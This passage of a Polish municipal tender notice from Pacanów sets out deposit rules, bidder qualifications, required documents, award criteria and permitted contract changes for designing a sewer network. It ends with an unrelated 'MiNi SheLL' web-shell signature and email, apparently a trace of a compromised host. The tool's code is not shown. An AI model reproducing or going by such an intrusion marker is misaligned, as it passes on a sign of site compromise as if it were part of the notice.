4.	W przypadku wadium wniesionego w formie gwarancji, z treści tej gwarancji winno wynikać bezwarunkowo, że na pierwsze pisemne żądanie zgłoszone przez zamawiającego, w terminie związania ofertą, gwarant zobowiązuje się do wypłaty Zamawiającemu  pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy PZP. Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą.
5.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, najpóźniej do dnia 18.01.2016r. do godz. 11.00.
6.	Na pisemny wniosek Zamawiający jest zobowiązany zwrócić wadium niezwłocznie Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.	Zamawiający (zgodnie z art. 46 ust.1 ustawy PZP) zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy PZP.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy z sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy (jeżeli takiego zabezpieczenia żądano).
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
10.	Zamawiający zatrzyma również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
11.	Pozostałe przypadki zwrotu lub zatrzymania wadium zawarto w art. 46 ustawy PZP.
12.	Wykonawca którego oferta nie będzie zabezpieczona wadium zostanie przez Zamawiającego wykluczony z postępowania, a jego oferta zostanie odrzucona.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania uprawnień do wykonywania określonej działalności  lub czynności,  Zamawiający nie precyzuje szczegółowych wymagań odnośnie ww. warunku.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zgodnie z wzorem  (załącznik nr 2) o którym mowa w pkt. IX.1, lit. a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania  niezbędnej wiedzy i doświadczenia Zamawiający uzna że warunek ten zostanie spełniony jeśli Wykonawca wykaże,  wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
-  co najmniej 1 usługę  projektową  polegającą  na opracowaniu dokumentacji projektowej w zakresie  budowy lub przebudowy  sieci kanalizacji sanitarnej - o długości  min. 5 km,
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.

Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zgodnie z wzorem  (załącznik nr 2 do SIWZ) o którym mowa w pkt. IX.1, lit. a) SIWZ, a warunków szczegółowych na podstawie złożonych:
-	wykazu wykonanych głównych  usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. Wykaz należy przygotować  zgodnie ze wzorem (załącznik nr 6 do SIWZ) o którym mowa w pkt. IX.1.lit b,
Wykonawca do wykazu załączy co najmniej te dowody, które będą potwierdzały spełnienie warunku posiadania wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania odpowiedniego potencjału technicznego ,  Zamawiający nie precyzuje szczegółowych wymagań odnośnie ww. warunku.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zgodnie z wzorem  (załącznik nr 2) o którym mowa w pkt. IX.1, lit. a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna, że warunek ten zostanie spełniony jeśli Wykonawca wykaże,  że przy realizacji zamówienia będzie dysponował;
-  co najmniej 1 osobą  (projektant) - która  posiada  uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, a także posiada  minimum 3 - letnią praktykę zawodową i doświadczenie w  projektowaniu sieci kanalizacyjnych.

Uwaga:
Zamawiający dopuszcza uprawnienia budowlane odpowiadające ww. uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów; jak również uprawnienia uznane na zasadach określonych w przepisach odrębnych lub uzyskane  w innych państwach członkowskich Unii Europejskiej zgodnie z obowiązującymi tam procedurami.

Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zgodnie z wzorem  (załącznik nr 2 do SIWZ) o którym mowa w pkt. IX.1, lit. a) SIWZ, a warunków szczegółowych na podstawie złożonych:
-	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem (załącznik nr 4 do SIWZ)o którym mowa w pkt. IX.1. lit. c)
-	 oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie ze wzorem 
(załącznik nr 5) o którym mowa w pkt. IX.1. lit e )SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  Zamawiający nie precyzuje szczegółowych wymagań odnośnie w/w warunku.Zamawiający nie precyzuje szczegółowych wymagań odnośnie w/w warunku.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zgodnie z wzorem  (załącznik nr 2) o którym mowa w pkt. IX.1, lit. a) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenie o oddaniu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, ( wg. wzoru podanego w załączniku nr 4a do SIWZ) w przypadku powoływania się Wykonawcy na potencjał innych podmiotów,
b) wypełniony formularz ofertowy (wg wzoru podanego w załączniku nr 1 do SIWZ),
c) dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Długość okresu rękojmi na wykonaną dokumentację - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zgodnie z treścią art. 144 ust. 1 ustawy PZP przewiduje następujące okoliczności i warunki zamiany postanowień zawartej umowy:

a)	zmiany terminu-ów realizacji przedmiotu umowy, poprzez jego skrócenie w przypadku zgodnej woli  obu Stron lub poprzez jego przedłużenie w następujących przypadkach:
-  z przyczyn leżących  po stronie Zamawiającego w szczególności dotyczących konieczności podjęcia istotnych decyzji zależnych od Zamawiającego,  mających wpływ na termin realizacji przedmiotu umowy,
-  wystąpienie okoliczności niezależnych od Stron i niezawinionych przez Wykonawcę (spowodowane przez siłę wyższą - zdarzenie niezależne  od żadnej ze stron którego strony nie były w stanie wcześniej przewidzieć i którego zaistnienie lub skutki uniemożliwiają wykonanie niniejszej umowy zgodnie z jej postanowieniami) , mających  istotny wpływ na termin wykonania przedmiotu umowy , 
-   wystąpienia zmian będących następstwem  działania organów administracji, w szczególności przekroczenie ustawowych terminów wydania przez organy  i instytucje niezbędnych decyzji, uzgodnień , pozwoleń itp.
- konieczności uwzględnienia wydanych w toku realizacji  prac zaleceń właściwych służb i instytucji, jeżeli powodują one wydłużenie czasu realizacji i nie wynikają z przyczyn, za które  Wykonawca ponosi odpowiedzialność,
- wystąpienie konieczności uzyskania od organów administracji państwowej  dodatkowych  nieplanowanych decyzji, uzgodnień , pozwoleń, niezbędnych do wykonania przedmiotu zamówienia, 
- wystąpienie zmian spowodowanych wniesieniem przez strony zastrzeżeń, odwołań na etapie wydawania decyzji administracyjnych, mających istotny wpływ na termin realizacji przedmiotu umowy,
- brak pisemnej zgody właściciela nieruchomości przy  jednoczesnym braku możliwości alternatywnego rozwiązania przebiegu  sieci, która powoduje konieczność uzyskania stosownej decyzji ograniczającej prawo dysponowania nieruchomością lub wydania nowej decyzji administracyjnej, 
- konieczności wprowadzenia istotnych zmian w opracowanej dokumentacji projektowej w  przypadku wystąpienia okoliczności, za które Wykonawca nie ponosi odpowiedzialności i których nie można było w sposób oczywisty przewidzieć w chwili zawarcia umowy,
- w przypadku konieczności zlecenia Wykonawcy ewentualnych robót dodatkowych które będą miały wpływ na termin realizacji zamówienia podstawowego, 
- jeżeli Zamawiający dokona zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć na etapie przygotowania inwestycji do realizacji.
Ponadto Zamawiający zastrzega sobie możliwość zmiany terminu realizacji umowy (przedłużenie terminu), w przypadku gdy Wykonawca wykaże a  Zamawiający potwierdzi i uzna za uzasadnione, iż prace projektowe  nie mogą zostać zakończone w umownym terminie ze względu na sprzeciw lub brak wyrażenia zgody przez właścicieli nieruchomości przez które przebiegać ma projektowana sieć, co przy braku alternatywnych rozwiązań  spowodowało istotne opóźnienia realizacji przedmiotu zamówienia. Dokumentami potwierdzającymi w/w okoliczności będą w szczególności przedłożone Zamawiającemu pisemne oświadczenia właścicieli wyrażające sprzeciw na projektowany przebieg sieci lub pisemna informację Wykonawcy opisująca zaistniałą okoliczność wraz z danymi osobowymi i teleadresowymi osób zgłaszających zastrzeżenia. Wykonawca zobowiązany jest ponadto uzasadnić racjonalność proponowanego rozwiązania w zakresie przebiegu trasy kwestionowanym przez właściciela zakresie. 
W przypadku  wystąpienia  ww. okoliczności  w uzasadnionych  przypadkach  Zamawiający dopuszcza  również możliwość zmiany terminu realizacji przedmiotu umowy dla części przedmiotu zamówienia.
 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin wykonania umowy może ulec przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 

b)	zmiany płatności - w przypadku zgodnej woli obu Stron, lub gdy zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć  na etapie przygotowywania inwestycji do realizacji bądź w chwili składania oferty, 
c)	zmiany osób lub podmiotów odpowiedzialnych za wykonywanie zadania ze strony Wykonawcy lub Zamawiającego lub osób reprezentujących - jeżeli zmiana taka nie wpłynie na pozostałe warunki  realizacji umowy,
d)	zmiana zakresu rzeczowego przedmiotu umowy - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć na etapie przygotowywania inwestycji do projektowania. Zamawiający  ponadto przewiduje także   możliwość  ograniczenia  lub  zmiany zakresu przedmiotu  zamówienia w przypadku braku możliwości uzyskania uzgodnień od stron postępowania w stopniu uniemożliwiającym wykonanie części zamówienia w takim przypadku Wykonawca otrzyma wynagrodzenie wyłącznie za wykonaną część zamówienia ustaloną protokołem podpisanym przez Strony umowy,
e)	zmiany wynagrodzenia - jeżeli nastąpi zmiana zakresu  przedmiotu umowy w stosunku do treści oferty (nowe wynagrodzenie będzie ustalane w  drodze negocjacji przez strony w odniesieniu do cen zawartych w złożonej ofercie  uwzględniając zakres zadania) , jak również w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany  stawki podatku VAT.
2.	Zamawiający dopuszcza także możliwość zmian postanowień umowy w następujących przypadkach:
a)	gdy wprowadzenie  zmian jest  korzystne dla Zamawiającego,
b)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
c)	zmiany podwykonawcy ze względów losowych, o ile zostali przewidziani,
d)	wystąpienie zmian, których konieczność wprowadzenia będzie wynikała z wymagań instytucji   współfinansujących realizację przedmiotu umowy,
e)	wystąpienie nieistotnych zmian, które nie mają wpływu na istotne postanowienia umowy (termin, zakres, wartość zamówienia).
3.	Wszelkie zmiany treści umowy będą  wymagały  zgody obu Stron  oraz  zachowania formy pisemnej poprzez zawarcie stosownego  aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pacanow.pl/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy Pacanów, 28-133 Pacanów, ul. Rynek 15, e-mail: inwest@pacanow.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2016 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: w Urzędzie Gminy w Pacanowie, ul. Rynek 15, pok. nr 101 (sekretariat, I piętro) w terminie do dnia 18.01.2016r. do godz. 11.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przewiduje się możliwość uzyskania  dofinansowania ze środków EFRR..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com